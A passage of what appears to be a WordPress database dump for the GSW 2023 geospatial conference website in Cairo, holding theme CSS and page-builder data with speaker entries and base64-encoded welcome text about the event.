 border-style: dashed;\n}\n.dt-icon-border-dotted.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-style: dotted;\n}\n.dt-icon-border-double.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dashed.dt-icon-border-on:before {\n  border-style: dashed;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dotted.dt-icon-border-on:before {\n  border-style: dotted;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-double.dt-icon-border-on:before {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-border-on:after {\n  border-width: 2px;\n  border-style: solid;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dashed.dt-icon-hover-border-on:after {\n  border-style: dashed;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dotted.dt-icon-hover-border-on:after {\n  border-style: dotted;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-double.dt-icon-hover-border-on:after {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover {\n  font-size: 32px;\n}\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-icon {\n  color: #fff;\n  background: none;\n}\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-icon {\n  color: #ffffff;\n  background: none;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-1 {\n  grid-template-columns: 60px minmax(0,1fr);\n  grid-column-gap: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-2 {\n  grid-template-columns: minmax(0,1fr) 60px;\n  grid-column-gap: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-2 .text-icon {\n  margin-left: 0;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-3 {\n  grid-template-columns: 60px minmax(0,1fr);\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-3 .dt-text-title {\n  margin-left: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-title,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-title a {\n  color: #eeee22;\n  background: none;\n  font-weight: bold;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-title {\n  margin-bottom: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-desc {\n  margin-bottom: 0px;\n}\n\";}'),
(6093,2167,'_elementor_edit_mode','builder'),
(6094,2167,'_elementor_template_type','wp-page'),
(6095,2167,'_elementor_version','3.7.8'),
(6096,2167,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),
(6097,2167,'_elementor_page_assets','a:0:{}'),
(6099,2167,'_dt_page_overrides_right_margin',''),
(6100,2167,'_dt_page_overrides_left_margin',''),
(6101,2167,'_dt_mobile_page_padding_right',''),
(6102,2167,'_dt_mobile_page_padding_left',''),
(6103,2167,'_dt_microsite_primary_menu',''),
(6104,2167,'_dt_microsite_split_left_menu',''),
(6105,2167,'_dt_microsite_split_right_menu',''),
(6106,2167,'_dt_microsite_mobile_menu',''),
(6109,2382,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6110,2382,'_wp_page_template','default'),
(6111,2382,'_elementor_edit_mode','builder'),
(6112,2382,'_elementor_template_type','wp-page'),
(6113,2382,'_elementor_version','3.7.8'),
(6114,2382,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29j